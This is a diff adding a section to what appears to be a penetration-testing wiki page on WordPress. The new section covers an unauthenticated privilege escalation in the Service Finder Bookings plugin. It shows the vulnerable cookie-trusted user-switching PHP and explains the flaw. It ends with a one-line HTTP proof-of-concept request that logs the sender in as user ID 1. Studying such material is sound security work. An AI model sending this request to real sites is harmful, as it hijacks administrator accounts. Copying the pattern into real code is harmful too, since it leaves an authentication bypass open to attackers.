diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md
index 7e65453a3..549507bfc 100644
--- a/src/network-services-pentesting/pentesting-web/wordpress.md
+++ b/src/network-services-pentesting/pentesting-web/wordpress.md
@@ -608,6 +608,59 @@ add_action( 'profile_update', function( $user_id ) {
 
 ---
 
+### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”)
+
+Some plugins wire user-switching helpers to the public `init` hook and derive identity from a client-controlled cookie. If the code calls `wp_set_auth_cookie()` without verifying authentication, capability and a valid nonce, any unauthenticated visitor can force login as an arbitrary user ID.
+
+Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):
+
+```php
+function service_finder_submit_user_form(){
+ if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
+ $user_id = intval( sanitize_text_field($_GET['switch_user']) );
+ service_finder_switch_user($user_id);
+ }
+ if ( isset($_GET['switch_back']) ) {
+ service_finder_switch_back();
+ }
+}
+add_action('init', 'service_finder_submit_user_form');
+
+function service_finder_switch_back() {
+ if ( isset($_COOKIE['original_user_id']) ) {
+ $uid = intval($_COOKIE['original_user_id']);
+ if ( get_userdata($uid) ) {
+ wp_set_current_user($uid);
+ wp_set_auth_cookie($uid); // 🔥 sets auth for attacker-chosen UID
+ do_action('wp_login', get_userdata($uid)->user_login, get_userdata($uid));
+ setcookie('original_user_id', '', time() - 3600, '/');
+ wp_redirect( admin_url('admin.php?page=candidates') );
+ exit;
+ }
+ wp_die('Original user not found.');
+ }
+ wp_die('No original user found to switch back to.');
+}
+```
+
+Why it’s exploitable
+
+- Public `init` hook makes the handler reachable by unauthenticated users (no `is_user_logged_in()` guard).
+- Identity is derived from a client-modifiable cookie (`original_user_id`).
+- Direct call to `wp_set_auth_cookie($uid)` logs the requester in as that user without any capability/nonce checks.
+
+Exploitation (unauthenticated)
+
+```http
+GET /?switch_back=1 HTTP/1.1
+Host: victim.example
+Cookie: original_user_id=1
+User-Agent: PoC
+Connection: close
+```
+
+---
+
 ### WAF considerations for WordPress/plugin CVEs
 
 Generic edge/server WAFs are tuned for broad patterns (SQLi, XSS, LFI). Many high‑impact WordPress/plugin flaws are application-specific logic/auth bugs that look like benign traffic unless the engine understands WordPress routes and plugin semantics.
@@ -722,5 +775,7 @@ The server responds with the contents of `wp-config.php`, leaking DB credentials
 - [Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses](https://patchstack.com/articles/hosting-security-tested-87-percent-of-vulnerability-exploits-bypassed-hosting-defenses/)
 - [WooCommerce Payments ≤ 5.6.1 – Unauth privilege escalation via trusted header (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/woocommerce-payments/vulnerability/wordpress-woocommerce-payments-plugin-5-6-1-unauthenticated-privilege-escalation-vulnerability)
 - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/)
+- [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/)
+- [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability)
 
 {{#include ../../banners/hacktricks-training.md}}